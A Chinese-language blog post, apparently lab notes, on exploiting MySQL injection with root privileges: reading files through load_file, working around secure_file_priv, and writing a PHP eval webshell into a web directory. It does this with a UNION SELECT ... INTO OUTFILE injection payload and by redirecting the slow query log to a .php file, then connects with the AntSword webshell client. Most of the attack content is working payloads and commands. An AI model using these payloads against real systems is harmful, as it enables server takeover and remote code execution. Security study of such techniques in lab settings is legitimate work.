sql 读写注入

root高权限读写注入

load_file 读取文件

大姐我真是整了半天都是nullnullnull缝子

结果看了半天这个my.ini是被隐藏的大哥

load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客

终于读出来了

此时参数值系统变量 secure_file_priv已经被修改

原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。

这个变量就可以用来限制操作路径

into_outfile 写入文件

?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+

我们可以看到2.txt被写入

我们可以写入一句话木马

复制代码
?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+

先检查一下是否上传成功

用蚁剑发现连接成功了v

太搞笑了连接自己

那么如果把my.ini内的参数secure_file_priv设置在c盘目录下

复制代码
secure_file_priv=c:/

我们可以发现我们就只能在c盘进行操作

mysql写马

set global slow_query_log=1;

set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'

D:\\phpstudy_pro\\WWW\d.php---------》shell路径

可以看到有了d.php

复制代码
select '<?php eval($ POST[a])?>' or SLEEP(1);

但是!!!

我发现如果sleep的少,并不会记录到日志中去

要sleep的久一点

Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户

复制代码
select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);

可以看一下我们的日志d.php

因为尝试了很多次。。所以有很多

我们可以发现都是sleep(11)的被记录了

蚁剑连一下看看

相关推荐
无限的鲜花5 小时前
反射(原创推荐)
java·开发语言
运维行者_5 小时前
企业无线网络监控的挑战与智能化演进趋势
大数据·运维·服务器·网络·数据库
IT二叔5 小时前
Java项目部署-03-teamcity-cicd-docker镜像流水线方式部署
java·ci/cd·持续部署
一路向北he5 小时前
字节钢铁军团--“提供情境,而非控制”
java·开发语言·前端
国强_dev5 小时前
技术探讨:使用 stunnel 加密转发数据库连接时,如何获取客户端真实 IP?
数据库·网络协议·tcp/ip
@insist1236 小时前
系统规划与管理师-信息系统规划核心工作要点解析
数据库·软考·系统规划与管理师·软件水平考试·系统规划与管理工程师
超级数据查看器6 小时前
超级数据查看器 v10.0 发布
java·大数据·数据库·sqlite·安卓
数安3000天6 小时前
增量数据如何自动分类分级,避免目录“过期“?
大数据·数据库
折哥的程序人生 · 物流技术专研7 小时前
《Java 100 天进阶之路》第50篇:阻塞队列与并发容器(2026版)
java·面试题·java进阶·blockingqueue·并发容器·集合源码·java100天进阶
ai_coder_ai7 小时前
编写自动化脚本,在自己后端服务中使用Open Api进行设备相关操作
java·运维·自动化